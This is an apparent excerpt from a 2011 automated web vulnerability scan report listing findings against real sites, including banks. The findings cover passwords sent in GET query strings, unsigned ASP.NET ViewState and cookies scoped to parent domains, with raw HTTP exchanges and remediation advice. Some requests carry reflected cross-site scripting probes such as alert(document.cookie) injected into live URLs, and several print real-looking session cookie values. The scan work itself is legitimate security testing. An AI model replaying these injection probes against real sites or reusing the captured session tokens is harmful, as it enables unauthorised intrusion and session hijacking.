<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- Template: InsideP ...[SNIP]... <link href='http://www.arbornetworks.com/components/com_securityimages/securityimages.css' rel='stylesheet' type='text/css'/><img src='http://www.arbornetworks.com/components/com_securityimages/plugins/core/1.1/imageGenerator.php?refid=430676c291d53f0c137a6af08cedc7a54c3d3abe&size=&sessionid=68a202e1a5cc93aaa19630ecb49b46a8' title='This image contains a scrambled text, it is using a combination of colors, font size, background, angle in order to disallow computer to automate reading. You will have to reproduce it to post on my homepage' alt='This image contains a scrambled text, it is using a combination of colors, font size, background, angle in order to disallow computer to automate reading. You will have to reproduce it to post on my homepage' id='PFSecurity' name='PFSecurity' border='0'><a href="javascript:SecurityImagesNew('PFSecurity','PFSecurity_try', 'PFSecurity_reload');" id='askNewPicture' title='Ask a new picture' alt='Ask a new picture'> ...[SNIP]...
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!-- Template: InsideP ...[SNIP]... <link href='http://www.arbornetworks.com/components/com_securityimages/securityimages.css' rel='stylesheet' type='text/css'/><img src='http://www.arbornetworks.com/components/com_securityimages/plugins/core/1.1/imageGenerator.php?refid=c90ab5512d38a70929ae7fc2a99f3c2d34fa1e75&size=&sessionid=bcc07bd00e8de905ed6e6f0d69bfca86' title='This image contains a scrambled text, it is using a combination of colors, font size, background, angle in order to disallow computer to automate reading. You will have to reproduce it to post on my homepage' alt='This image contains a scrambled text, it is using a combination of colors, font size, background, angle in order to disallow computer to automate reading. You will have to reproduce it to post on my homepage' id='PFSecurity' name='PFSecurity' border='0'><a href="javascript:SecurityImagesNew('PFSecurity','PFSecurity_try', 'PFSecurity_reload');" id='askNewPicture' title='Ask a new picture' alt='Ask a new picture'> ...[SNIP]...
GET /2011/01/10/2573323/earthtalk-are-atlantic-bluefin.html HTTP/1.1 Host: www.kansascity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/1.3.41 Vary: Accept-Encoding Last-Modified: Thu, 03 Feb 2011 01:13:01 GMT ETag: "1e3db5c-e2bf-4d4a011d" Accept-Ranges: bytes Content-Length: 58047 Content-Type: text/html Expires: Thu, 03 Feb 2011 01:16:50 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 01:16:50 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
...[SNIP]... <li><a href="http://www.kansascity.com/placead/?catid=784&-session=ComboAd:3F4CE782%0A032091B4EFpyUGD8BCA5">Sell A Car</a> ...[SNIP]... <li><a href="http://www.cars.com/go/dealersearch/specials.jsp;jsessionid=YKUYUUH4MLJIXLAYIETE2UY?specialsURL=http%3A%2F%2Fcars.adperfect.com%2Findex%2Faffiliate%2Findex.html%3Fapn%3Dkansascity&apn=kansascity&aff=kansascity">Used Car Specials</a> ...[SNIP]... <li><a href="http://www.cars.com/go/dealersearch/specials.jsp;jsessionid=YKUYUUH4MLJIXLAYIETE2UY?specialsURL=http%3A%2F%2Fcars.adperfect.com%2Findex%2Faffiliate%2Findex.new.html%3Fapn%3Dkansascity&apn=kansascity&aff=kansascity">New Car Specials</a> ...[SNIP]... <li><a href="http://www.kansascity.com/placead/?catid=779&-session=ComboAd:3F4CE7%0A82032091B273HPYGD7BB43">Sell A Home</a> ...[SNIP]...
GET / HTTP/1.1 Host: www.lokeshdhakar.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:17:01 GMT Server: Apache X-Pingback: http://www.lokeshdhakar.com/xmlrpc.php Vary: Accept-Encoding Content-Length: 37290 Connection: close Content-Type: text/html; charset=utf-8
The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.
Issue remediation
All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.
The page contains a form with the following action URL, which is submitted using the GET method:
http://fis.com/fis/worldnews/worldnews.asp
The form contains the following password field:
password
Request
GET /fis/worldnews/worldnews.asp HTTP/1.1 Host: fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 00:54:33 GMT Connection: close Content-Length: 83533 Content-Type: text/html Set-Cookie: ASPSESSIONIDCASTCAST=LKGBFPGBNACCBLIDDPHBHANM; path=/ Cache-control: private
<html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="refresh" content="1800"> <title>FIS - Worldnews - Icelandic Group still up for grabs</title ...[SNIP]... <!-- LOGIN --> <form name="member_login">
GET /yourtown/news/north_end/2011/01/fishers_fight_claims_that_blue.html HTTP/1.1 Host: www.boston.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <!-- Need for HL --> <script language="JavaScript"><!--
The page contains a form with the following action URL, which is submitted using the GET method:
http://www.fis.com/fis/worldnews/worldnews.asp
The form contains the following password field:
password
Request
GET /fis/worldnews/worldnews.asp HTTP/1.1 Host: www.fis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 03 Feb 2011 00:58:54 GMT Connection: close Content-Length: 83551 Content-Type: text/html Set-Cookie: ASPSESSIONIDCASTCAST=PMHBFPGBGMDOPCOGKGMJMGLM; path=/ Cache-control: private
<html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <meta http-equiv="refresh" content="1800"> <title>FIS - Worldnews - Icelandic Group still up for grabs</title ...[SNIP]... <!-- LOGIN --> <form name="member_login">
The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.
By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.
You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.
Issue remediation
There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.
GET /m/pages/self-directed-investing.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /m/pages/zero-dollar-trades.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /m/pages/home.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
GET /m/pages/merrill-edge-advisory-center.aspx HTTP/1.1 Host: www.merrilledge.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
v1st=5BE36DBE8BA5F8DB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: chaseonline.chase.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 17909 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=363a4a0a-9240-4195-9a73-ca0f1962dd7b; domain=.chase.com; path=/ Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=5BE36DBE8BA5F8DB; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.chase.com Date: Wed, 02 Feb 2011 22:02:00 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta http-equiv="Pragma" content="no-cache"/ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /blog/view/bluefin_brigade_to_the_rescue HTTP/1.1 Host: food.change.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /stories/nobu-ignores-18000-people-asking-for-an-end-to-bluefin-sushi HTTP/1.1 Host: news.change.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
v1st=6FA7CC6BF769141F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: online.cardmemberservices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 18175 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=644d4c8d-b94c-4f70-9bbb-9d78f24ce9f8; domain=.cardmemberservices.com; path=/ Cache-Control: no-cache=Set-Cookie Expires: Thu, 01 Dec 1994 16:00:00 GMT Set-Cookie: v1st=6FA7CC6BF769141F; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.cardmemberservices.com Date: Wed, 02 Feb 2011 22:02:10 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta http-equiv="Pragma" content="no-cache"/ ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /article/SB10001424052748703779704576073610615364334.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:22 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=2c5be191-dbef-49ce-b161-dd9949a1fa00; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:22 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:22 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep04 - Wed 02/02/11 - 16:54:45 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:37 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=30 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 183840
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /article/SB10001424052748703956604576110453371369740.html HTTP/1.1 Host: online.wsj.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:04:24 GMT Server: Apache/2.0.58 (Unix) Set-Cookie: djcs_route=dc538be4-28ab-4562-9b58-129c8fc82f54; domain=.wsj.com; path=/; Expires=Sat Jan 30 20:04:24 2021; max-age=315360000 Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Fri, 03-Feb-2012 01:04:24 GMT Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com FastDynaPage-ServerInfo: sbkj2kapachep08 - Wed 02/02/11 - 15:46:44 EST Cache-Control: max-age=15 Expires: Thu, 03 Feb 2011 01:04:39 GMT Vary: Accept-Encoding P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC Keep-Alive: timeout=2, max=32 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 199594
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /auth/AuthService HTTP/1.1 Host: onlineservices.wachovia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:02:13 GMT Server: IBM_HTTP_Server Set-Cookie: TLTSID=16FB92962F18102F5856F16EF5F79C09; Path=/; Domain=.wachovia.com Cache-Control: no-store Pragma: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: AuthSvsSessionID=IzW+wP+VVHuq0l/F/NqxgmwCKP0=55 4N.LEInmgXLF30lFrJTXIXXWgrr.1012025; HttpOnly; Path=/; Domain=.wachovia.com; Secure x-frames-option: deny Connection: close Content-Type: text/html Content-Language: en Content-Length: 13099
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!--
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: pncpoints.visaextras.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /members/stepthree HTTP/1.1 Host: www.cualn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:00:30 GMT Server: Apache X-Powered-By: PHP/5.2.14 Set-Cookie: SESS5dcca8fe1cebbc00afd6b71bc7e17676=0505b6f8eb0dfb02deb4a1644b2c68ec; expires=Sat, 26-Feb-2011 04:33:50 GMT; path=/; domain=.cualn.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Thu, 03 Feb 2011 01:00:30 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 11430
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.directstartv.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tag/ipboard HTTP/1.1 Host: www.forum-software.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cron_image.html HTTP/1.1 Host: www.macaudailytimes.com.mo Proxy-Connection: keep-alive Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VivvoSessionId=3a9063f24d4a054f92c63
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /imagecode.html?article_id=21109 HTTP/1.1 Host: www.macaudailytimes.com.mo Proxy-Connection: keep-alive Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VivvoSessionId=3a9063f24d4a054f92c63
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /js/lang.php HTTP/1.1 Host: www.macaudailytimes.com.mo Proxy-Connection: keep-alive Referer: http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(document.cookie)-'045651d38d6=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VivvoSessionId=3a9063f24d4a054f92c63
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /times-lab/21109-Tragedy-our-Commons.html HTTP/1.1 Host: www.macaudailytimes.com.mo Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/gpl-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /j.ad?site=wareseekercom&adSpace=ros&tagKey=1282868635&th=24526296851&tKey=aVmn6ySVfC4AvEpWInUWZbPudZbi90&size=728x90|468x60&p=16284953&a=1&flashVer=10&ver=1.20&center=1&noAd=1&url=http%3A%2F%2Fsearch.wareseeker.com%2Fip-boardc8b75%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E47d05c4592a%2F&rurl=http%3A%2F%2Fburp%2Fshow%2F30&f=0&rnd=16284848 HTTP/1.1 Host: a.tribalfusion.com Proxy-Connection: keep-alive Referer: http://search.wareseeker.com/ip-boardc8b75%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E47d05c4592a/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ANON_ID=arn9a2NZaiMt6memKmHwxrdUs3tYbQRKAXpu2WGR5OjVZdBuEFn93sv7X8ZalwCuq7F0QFYFP3dkBSfkBxAXNnEbfxVOGZbsNxBYCqwmLZbm12GZcXljw7f3HikS9n1bOhCZaj5F8OTFsyVTkN7ZcNnRH2BBBlPyXJhFNDjgcJVvgaVG11CndFwGrWSEZc2naDJGDqftHQnmOHDvd3ePbOL6FaZdDGPg1Lmnn0J9OYX6Zbhbbv4GfpndrHVmW0s1qVrOtS6IP3EdwCpNAPNHMTens1QnwfVYFZb9HSyoPpMngmEQARRrTQDIAvXR3FQ3SYbdA8SQHiZbodgZap2C6ZaZamQrMS1cCcKUHYxod4r4Zb1YydwXbNmyf51VTTd7RQoZd7rH6AYyNUaywojPuhZcvhp
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /adserver/vdi/762701?d=D8DB51BF08484217F5D14AB47F4002AD HTTP/1.1 Host: ads.adbrite.com Proxy-Connection: keep-alive Referer: http://www.arbornetworks.com/report Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D; vsd="0@a@4d49757a@www.ehow.com"
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Content-Type: image/gif Date: Wed, 02 Feb 2011 23:36:07 GMT Expires: Mon, 26 Jul 1997 05:00:00 GMT P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC" Server: Apache-Coyote/1.1 Set-Cookie: vsd="0@1@4d49ea68@www.arbornetworks.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/ Content-Length: 42
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /select/Login HTTP/1.1 Host: adwords.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /scripts/track.php?visitorId=7432e15fddd3a34a2d79b00lmU2qECVV&tracking=F&url=H_www.invisionpower.com%2F%2Fproducts%2Fboard%2Ffeatures%2F&referrer=H_burp%2Fshow%2F38&getParams=%3F95e51--%253E%253Ca%253E1fddadebe75%3D1&anchor=&cookies= HTTP/1.1 Host: affiliate.invisionpower.com Proxy-Connection: keep-alive Referer: http://www.invisionpower.com/products/board/features/?95e51--%3E%3Ca%3E1fddadebe75=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=61175156.1296696677.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/38; __utma=61175156.1901611536.1296685558.1296685558.1296696677.2; __utmc=61175156; __utmb=61175156.1.10.1296696677
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:30:40 GMT Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.9 X-Powered-By: PHP/5.2.9 P3P: CP="NOI NID ADMa DEVa PSAa OUR BUS ONL UNI COM STA OTC" Set-Cookie: PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; expires=Sun, 31-Jan-2021 01:30:40 GMT; path=/; domain=.invisionpower.com Content-Length: 0 Content-Type: application/x-javascript
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /api/ping?format=jsonp&key=4f085ab2452b05f4c24c6b37dbc58a3b&loc=http%3A%2F%2Fcommunity.invisionpower.com%2F&subId=d59e71895dde9e0dbe7525217bd974&v=1&jsonp=vglnk_jsonp_12966855687740 HTTP/1.1 Host: api.viglink.com Proxy-Connection: keep-alive Referer: http://community.invisionpower.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: blogsearch.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html><head><meta HTTP-EQUIV="content-type" content="text/html; charset=UTF-8"><meta description="Google Blog Search provides fresh, relevant search results from millions of feed-enabled blogs. Users ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bkshp HTTP/1.1 Host: books.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:08:19 GMT Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=109a9aeaece08aed:TM=1296691699:LM=1296691699:S=sEECQby9jva9KsA1; expires=Sat, 02-Feb-2013 00:08:19 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: OFE/0.1 Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /books HTTP/1.1 Host: books.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:08:18 GMT Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PREF=ID=75899bb590a713b6:TM=1296691698:LM=1296691698:S=LGIgDlcm48-CMNO0; expires=Sat, 02-Feb-2013 00:08:18 GMT; path=/; domain=.google.com X-Content-Type-Options: nosniff Server: OFE/0.1 Connection: close
